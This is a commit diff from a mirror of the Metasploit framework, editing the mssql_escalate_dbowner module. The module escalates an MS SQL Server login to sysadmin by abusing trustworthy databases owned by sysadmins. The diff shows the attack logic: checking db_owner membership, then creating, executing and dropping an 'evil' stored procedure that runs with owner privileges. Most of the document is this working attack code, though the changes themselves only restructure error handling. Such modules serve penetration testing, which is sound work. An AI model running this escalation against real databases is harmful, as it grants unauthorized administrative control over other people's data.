infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

requested updates

bug/bundler_fix
nullbind 2014-10-06 23:52:30 -05:00
parent ebf4e5452e
commit 031fb19153
1 changed files with 117 additions and 122 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

33
modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb
View File

@ -39,11 +39,7 @@ class Metasploit3 < Msf::Auxiliary
# Query for sysadmin status
print_status("Checking if #{datastore['username']} has the sysadmin role...")
begin
mystatus = check_sysadmin
rescue
print_error('Sorry, the database connection failed.')
end
# Check if user has sysadmin role
if mystatus == 1
@ -51,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
else
# Check for trusted databases owned by sysadmins
print_status("You're NOT a sysadmin, let's try to change that.")
print_error("You're NOT a sysadmin, let's try to change that.")
print_status("Checking for trusted databases owned by sysadmins...")
trustdb_list = check_trustdbs
if trustdb_list == 0
@ -83,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
print_error("Fail buckets, something went wrong.")
end
else
print_error("Fail buckets, something went wrong.")
print_error("Error: #{escalate_status}")
end
end
end
@ -126,6 +122,10 @@ class Metasploit3 < Msf::Auxiliary
# Run query
result = mssql_query(sql, false) if mssql_login_datastore
disconnect
rescue
# Return on fail
return 0
end
# Parse query results
parse_results = result[:rows]
@ -134,10 +134,7 @@ class Metasploit3 < Msf::Auxiliary
# Return on success
return parse_results
rescue
# Return on fail
return 0
end
end
# ----------------------------------------------
@ -146,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary
def check_db_owner(trustdb_list)
# Check if the user has the db_owner role is any databases
trustdb_list.each { |db|
begin
# Setup query
sql = "use #{db[0]};select db_name() as db,rp.name as database_role, mp.name as database_user
from [#{db[0]}].sys.database_role_members drm
@ -158,11 +155,14 @@ class Metasploit3 < Msf::Auxiliary
result = mssql_query(sql, false) if mssql_login_datastore
disconnect
begin
# Parse query results
parse_results = result[:rows]
if parse_results.any?
print_good("- db_owner on #{db[0]} found!")
return db[0]
else
return 0
end
rescue
print_error("- No db_owner on #{db[0]}")
@ -175,7 +175,6 @@ class Metasploit3 < Msf::Auxiliary
# ----------------------------------------------
def escalate_privs(dbowner_db)
# Create the evil stored procedure WITH EXECUTE AS OWNER
begin
# Setup query
evilsql_create = "use #{dbowner_db};
DECLARE @myevil as varchar(max)
@ -189,44 +188,41 @@ class Metasploit3 < Msf::Auxiliary
exec(@myevil);
select 1;"
begin
# Run query
mssql_query(evilsql_create, false) if mssql_login_datastore
disconnect
rescue
# Return error
error = 'Failed to create stored procedure.'
return error
end
# Run the evil stored procedure
begin
# Setup query
evilsql_run = "use #{dbowner_db};
DECLARE @myevil2 as varchar(max)
set @myevil2 = 'EXEC sp_elevate_me'
exec(@myevil2);"
begin
# Run query
mssql_query(evilsql_run, false) if mssql_login_datastore
disconnect
rescue
# Return error
error = 'Failed to run stored procedure.'
return error
end
# Remove evil procedure
begin
# Setup query
evilsql_remove = "use #{dbowner_db};
DECLARE @myevil3 as varchar(max)
set @myevil3 = 'DROP PROCEDURE sp_elevate_me'
exec(@myevil3);"
begin
# Run query
mssql_query(evilsql_remove, false) if mssql_login_datastore
disconnect
@ -234,7 +230,6 @@ class Metasploit3 < Msf::Auxiliary
# Return value
return 1
rescue
# Return error
error = 'Failed to run stored procedure.'
return error